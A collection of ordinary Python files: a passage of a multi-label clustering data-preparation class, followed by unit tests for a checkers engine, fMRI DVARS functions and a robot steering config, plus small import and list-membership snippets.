self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather than by their seed
pickle.dump(label_class_counts, open(os.path.join(out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(out_dir, 'global_cluster_counts.p'), 'wb'))
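The (n - c) / c transform in compute_class_counts is the negative-to-positive ratio per cluster, the usual form of a positive-class weight for an imbalanced binary objective. A small sketch with made-up counts:

```python
# Hypothetical per-label positive counts per cluster seed, out of n = 100 docs.
n = 100
label_class_counts = {4: [10, 5], 11: [20, 15, 5]}  # seed -> per-label counts

# Total positives per cluster, then the negative-to-positive ratio, as in
# compute_class_counts; large weights correspond to rarely activated clusters.
cluster_counts = {seed: sum(c) for seed, c in label_class_counts.items()}
weights = {seed: (n - c) / c for seed, c in cluster_counts.items()}
```

Cluster 11 is activated in 40 of 100 documents, giving a weight of 1.5, while the rarer cluster 4 gets a proportionally larger weight.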
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
class MC2CFuzzyHierarchicalLabelClusterer():
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except (FileNotFoundError, EOFError):  # no cached C matrix yet; build and pickle it
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'), 'rb'))  # the former .format(data_type) was a no-op: the template has no placeholder
self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except ValueError:  # entries without a ranks field unpack to 3-tuples
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mutual exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
if label == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
self.clusters[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del self.clusters[r]
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
if not os.path.exists(out_dir):
os.mkdir(out_dir)
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(out_dir, str(seed))):
os.mkdir(os.path.join(out_dir, str(seed)))
with open(os.path.join(out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
with open(os.path.join(out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
out_dir = os.path.join(self.data_dir, 'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather than by their seed
pickle.dump(label_class_counts, open(os.path.join(out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(out_dir, 'global_cluster_counts.p'), 'wb'))
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
if __name__ == '__main__':
data_dir = 'processed_data/german/'
# data_dir = 'processed_data/cantemist/'
# data_dir = 'processed_data/spanish/es/'
# clusterer = MC2CLabelClusterer(data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.25)
clusterer = MC2CHierarchicalLabelClusterer(data_dir, max_cluster_size=15, min_cluster_size=5,
max_freq_threshold=0.25)
clusterer.main()
label_freqs = clusterer.compute_label_freqs()
for k, v in clusterer.clusters.items():
print(label_freqs[k], '---', [label_freqs[l] for l in v])
print(clusterer.mlb.classes_[k], '---', [clusterer.mlb.classes_[l] for l in v])
# print(clusterer.cluster_idx2seed[2])
# print(clusterer.cluster_idx2seed[3])
# print(clusterer.cluster_idx2seed[4])
#
# clusterer.generate_clusters_by_freq()
# all_labels = []
# for k, v in clusterer.clusters.items():
# print(k, '---', v)
# # all_labels.append(k)
# all_labels += v
#
# print(len(all_labels))
# print(len(set(all_labels)))
# # print(len(clusterer.clusters[11]))
# # print(mlb.classes_[1])
# #
# label_freqs = clusterer.compute_label_freqs()
# for k, v in clusterer.clusters.items():
# print(label_freqs[k], '---', [label_freqs[l] for l in v])
#
# print(clusterer.C[1,55])
# print(all_labels)
# seed = 7
# for seed in clusterer.determine_seeds():
# new_E = clusterer.E[list(clusterer.clusters[seed]), :]
#
# new_array = [tuple(row) for row in new_E.T]
# counts = Counter(new_array)
# print("total unique combos of seed {}:".format(str(seed)), len(set(new_array)))
# print(counts.values())
# print('-' * 100)
| 57.475722 | 123 | 0.577599 | 12,263 | 93,513 | 4.224578 | 0.034249 | 0.015635 | 0.023549 | 0.024322 | 0.972938 | 0.970853 | 0.969405 | 0.968826 | 0.967745 | 0.965873 | 0 | 0.00998 | 0.320672 | 93,513 | 1,626 | 124 | 57.51107 | 0.805528 | 0.203373 | 0 | 0.953648 | 0 | 0 | 0.049793 | 0.010813 | 0 | 0 | 0 | 0 | 0.012017 | 1 | 0.04721 | false | 0.006009 | 0.007725 | 0 | 0.063519 | 0.017167 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# test_checker.py (Fuchai/alphazero-checker, MIT license)
from unittest import TestCase
from checker import *
class TestChecker(TestCase):
def test_init_new_board(self):
checker = Checker()
checker.init_new_board()
print(checker)
checker.state[0, 0] = 0
checker.state[0, 4] = 100
print(checker)
checker.flip_board()
print(checker)
# player_play_verbose(checker.state)
print(checker.state.get_legal_actions())
# player_play_verbose(checker.state)
def test_multi_jump(self):
fake_board=np.array([[ 1, 0, 0, 0, 0, 0, 0, 0],
[ 0,-1, 0, 0, 0, 0, 0,-1],
[ 1, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0,-1, 0,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0,-1, 0,-1, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0],
[ 0, 0, 0, 0, 0, 0, 0, 0]])
checker = Checker()
checker.state.board=fake_board
print(checker)
actions, move_tree=checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_man_becomes_king(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0]])
checker = Checker()
checker.state.board = fake_board
print(checker)
actions, move_tree = checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_king_multi_jump(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
checker = Checker()
checker.state.board = fake_board
print(checker)
actions, move_tree = checker.state.get_legal_actions()
checker.print_moves(move_tree)
def test_fast_inputs(self):
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
path = [(7, 7, 5, 5), (5, 5, 3, 3), (3, 3, 5, 1)]
checker = Checker()
checker.state.board = fake_board
final = checker.player_play_fast_enter(checker.state, path)
def test_fast_inputs_human(self):  # renamed from test_fast_inputs: a duplicate name would shadow the first test
fake_board = np.array([[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0],
[-1, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 2]])
path = [(7, 7, 5, 5), (5, 5, 3, 3), (3, 3, 5, 1)]
checker = Checker()
print(checker)
checker.state.board = fake_board
final = checker.ask_human_for_action(checker.state)
def test_get_legal_actions(self):
fake_board = np.array([[1, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 1, 0, 1, 0, 1],
[0, 0, 1, 0, 1, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, -1, 0, 0, 0, 0, 0],
[0, -1, 0, 0, 0,-1, 0, -1],
[-1, 0,-1, 0,-1, 0, -1, 0],
[0, -1, 0,-1, 0, 0, 0, -1]])
checker = Checker()
print(checker)
checker.state.board = fake_board
checker.ask_human_for_action(checker.state)
checker.state.get_legal_actions()
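The tests above exercise `flip_board` only by printing. Conceptually, flipping a checkers board rotates it 180 degrees and swaps piece ownership so one move generator serves both players; a standalone sketch of that idea on plain nested lists (`flip_board` here is a hypothetical stand-in, not the project's implementation):

```python
def flip_board(board):
    """Rotate the board 180 degrees and negate piece ownership.

    Positive values are one player's pieces, negative the other's.
    """
    return [[-cell for cell in reversed(row)] for row in reversed(board)]

board = [
    [1, 0, 0],
    [0, -1, 0],
    [0, 0, 2],   # 2 could denote a king, as in test_king_multi_jump
]
flipped = flip_board(board)
```

Flipping twice should be the identity, which makes a handy sanity check.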
# qap/test_dvars.py (wangkangcheng/ccc, BSD-3-Clause license)
test_sub_dir = "test_data/1019436/session_1"
def test_remove_zero_variance_voxels():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import remove_zero_variance_voxels
func_motion = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"func_motion_correct", \
"rest_calc_tshift_resample_" \
"volreg.nii.gz"))
func_mask = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"functional_brain_mask", \
"rest_calc_tshift_resample_volreg" \
"_mask.nii.gz"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"no_zero_variance_voxels_mask.p"))
func_img = nb.load(func_motion)
mask_img = nb.load(func_mask)
func_data = func_img.get_data()
mask_data = mask_img.get_data()
out_mask_data = remove_zero_variance_voxels(func_data, mask_data)
with open(ref_out, "r") as f:
ref_mask_data = pickle.load(f)
# create a vector of True and False values
bool_vector = ref_mask_data == out_mask_data
assert bool_vector.all()
def test_load():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import load
func_motion = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"func_motion_correct", \
"rest_calc_tshift_resample_" \
"volreg.nii.gz"))
func_mask = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"functional_brain_mask", \
"rest_calc_tshift_resample_volreg" \
"_mask.nii.gz"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
func_out_data = load(func_motion, func_mask)
# to match the size of the reference output (shortened for file size
# issues)
func_out_data = func_out_data[0:20]
with open(ref_out, "r") as f:
ref_out_data = pickle.load(f)
# create a vector of True and False values
bool_vector = ref_out_data == func_out_data
assert bool_vector.all()
def test_robust_stdev():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import robust_stdev
func_data_file = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"robust_stdev_output.p"))
with open(func_data_file, "r") as f:
func_data = pickle.load(f)
with open(ref_out, "r") as f:
ref_mask_data = pickle.load(f)
func_out_data = robust_stdev(func_data)
# create a vector of True and False values
bool_vector = ref_mask_data == func_out_data
assert bool_vector.all()
def test_ar1():
import os
import pickle
import pkg_resources as p
import nibabel as nb
from qap.dvars import ar1
func_data_file = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"loaded_func.p"))
ref_out = p.resource_filename("qap", os.path.join(test_sub_dir, \
"rest_1", \
"dvars_data", \
"ar1_output.p"))
with open(func_data_file, "r") as f:
func_data = pickle.load(f)
with open(ref_out, "r") as f:
ref_out_data = pickle.load(f)
func_out_data = ar1(func_data)
# create a vector of True and False values
bool_vector = ref_out_data == func_out_data
assert bool_vector.all()
def run_all_tests_dvars():
test_remove_zero_variance_voxels()
test_load()
test_robust_stdev()
test_ar1()
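test_robust_stdev above only compares against a pickled reference. Conceptually, a robust standard deviation is often estimated from the interquartile range, since IQR ≈ 1.349·σ for Gaussian data; whether `qap.dvars.robust_stdev` uses exactly this estimator is an assumption here, so treat this as a sketch of the idea only:

```python
import statistics

def robust_stdev_sketch(values):
    """Estimate the standard deviation from the interquartile range.

    For Gaussian data, IQR is about 1.349 * sigma, so IQR / 1.349
    recovers sigma while staying insensitive to outliers in the tails.
    """
    q1, _, q3 = statistics.quantiles(values, n=4, method="inclusive")
    return (q3 - q1) / 1.349

clean = robust_stdev_sketch(list(range(1, 101)))
spiked = robust_stdev_sketch(list(range(1, 101)) + [10 ** 6])  # one huge outlier
```

A single extreme outlier barely moves the estimate, which is the whole point of using quartiles instead of the mean-based formula.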
#!/usr/bin/env python3
# clients/tests/test_steering_status.py (piofthings/piwars-2019, MIT license)
import sys
import os.path
sys.path.append(os.path.abspath(os.path.join(
os.path.dirname(__file__), "..")) + "/models/")
from steering_status import SteeringStatus
def test_Save():
steerConfig = SteeringStatus()
steerConfig.front_left_delta = 2
steerConfig.front_right_delta = 2
steerConfig.rear_left_delta = 2
steerConfig.rear_right_delta = 2
steerConfig.save("./data/steering_status.json")
steerConfig = SteeringStatus(json_file="./data/steering_status.json")
try:
assert steerConfig.front_left_delta == 2
print("Success front_left_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.front_right_delta == 2
print("Success front_right_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.rear_left_delta == 2
print("Success reart_left_delta")
except AssertionError as e:
print("Failed reart_left_delta")
try:
assert steerConfig.rear_right_delta == 2
print("Success rear_right_delta")
except AssertionError as e:
print("Failed rear_right_delta")
def test_Load():
steerConfig = SteeringStatus(json_file="./data/steering_status.json")
try:
assert steerConfig.front_left_delta == 2
print("Success front_left_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.front_right_delta == 2
print("Success front_right_delta")
except AssertionError as e:
print("Failed front_right_delta")
try:
assert steerConfig.rear_left_delta == 2
print("Success reart_left_delta")
except AssertionError as e:
print("Failed reart_left_delta")
try:
assert steerConfig.rear_right_delta == 2
print("Success rear_right_delta")
except AssertionError as e:
print("Failed rear_right_delta")
test_Save()
test_Load()
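Each field check above repeats the same try/assert/except block. A small helper (hypothetical, not part of the project) collapses the pattern while keeping the same Success/Failed output style:

```python
def check(name, actual, expected):
    """Print Success/Failed for one field, mirroring the test style above."""
    if actual == expected:
        print("Success " + name)
        return True
    print("Failed " + name)
    return False

class FakeSteeringStatus:  # stand-in for SteeringStatus in this sketch
    front_left_delta = 2
    rear_right_delta = 3

cfg = FakeSteeringStatus()
ok_left = check("front_left_delta", cfg.front_left_delta, 2)
ok_right = check("rear_right_delta", cfg.rear_right_delta, 2)
```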
# List_Find.py (mcjohnchristopher/Python_Samples, CC0-1.0 license)
some = [1, 2, 3, 4, 5, 6, 7]
print(9 in some)  # False: 9 is not in the list
print(6 in some)  # True
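For repeated membership lookups, converting the list to a set is the usual idiom, since set membership is O(1) on average versus O(n) for a list scan. A sketch extending the snippet above:

```python
some = [1, 2, 3, 4, 5, 6, 7]
lookup = set(some)          # O(1) average membership vs O(n) on a list
found_nine = 9 in lookup
found_six = 6 in lookup
```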
# stixcore/products/__init__.py (samaloney/STIXCore, BSD-3-Clause license)
from stixcore.products.level0.housekeeping import MaxiReport, MiniReport
from stixcore.products.level0.quicklook import LightCurve
from stixcore.products.level0.science import Aspect, CompressedPixelData, SummedPixelData
from stixcore.products.level1.quicklook import LightCurve  # note: rebinds LightCurve, shadowing the level0 import above
from stixcore.products.levelb.binary import LevelB
from stixcore.products.product import Product
